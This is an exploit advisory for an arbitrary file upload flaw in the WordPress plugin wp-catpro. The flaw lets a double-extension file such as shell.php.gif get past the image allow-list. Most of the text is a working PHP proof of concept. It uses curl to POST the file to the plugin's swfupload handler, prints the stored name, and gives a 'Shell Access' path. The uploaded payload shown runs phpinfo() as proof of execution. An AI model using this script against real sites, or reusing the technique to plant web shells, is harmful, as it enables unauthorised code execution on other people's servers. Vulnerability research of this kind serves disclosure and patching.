WordPress plugin wp-catpro - Arbitrary File Upload Vulnerability (double-extension bypass of the upload allow-list)
-----------------------------------------------------------------------
作者 (Author) => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 (Tested on) : Windows 7, BackTrack 5 R3
下载地址 (Download) : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
#=> Exploit 信息 (details):
------------------
# 攻击者可以上传 file/shell.php.gif — an attacker can upload a file named shell.php.gif. The double extension gets the file past the image allow-list; whether the web server then executes it as PHP depends on its handler configuration (e.g. Apache AddHandler matching ".php" in any position of the name), so confirm this on the target before relying on it.
# ("jpg", "gif", "png") // Allowed file extensions — the check evidently looks only at the final extension, so a ".php.gif" name is accepted as a GIF.
# "/uploads/"; // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format) — note that "." is permitted, so a second extension survives the filename filter.
------------------
#=> Exploit
-----------
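<?php
// Proof of concept: POST a double-extension file to the swfupload handler
// bundled with wp-catpro. The handler's allow-list only inspects the trailing
// extension, so "zik.php.gif" passes as an image. Whether the server then
// executes the stored file as PHP depends on its handler mapping (e.g. Apache
// AddHandler matching ".php" anywhere in the name) — verify on the target.
$uploadfile = "zik.php.gif";
$target = "http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php";

if (!is_readable($uploadfile)) {
    fwrite(STDERR, "payload file not found: $uploadfile\n");
    exit(1);
}

// The legacy "@/path" upload syntax is disabled by CURLOPT_SAFE_UPLOAD
// (default on since PHP 5.6) and was removed in PHP 7; CURLFile is the
// replacement. Fall back to "@" only where CURLFile does not exist (PHP < 5.5).
$fileField = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";

$ch = curl_init($target);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    'Filedata' => $fileField,
    // The destination folder is supplied by the client in the request; the
    // advisory does not show whether the handler validates it.
    'folder'   => '/wp-content/uploads/catpro/',
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
if ($postResult === false) {
    // Surface transport failures instead of silently printing an empty body.
    fwrite(STDERR, "curl error: " . curl_error($ch) . "\n");
    curl_close($ch);
    exit(1);
}
curl_close($ch);

// The handler stores the upload under a new (random) name, so the response
// is presumably the only place that name can be read from — print it verbatim.
print "$postResult";

// Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
?>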
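<?php
// Contents of the uploaded zik.php.gif: if the server executes the
// double-extension file as PHP, this dumps phpinfo() as proof of execution.
phpinfo();
?>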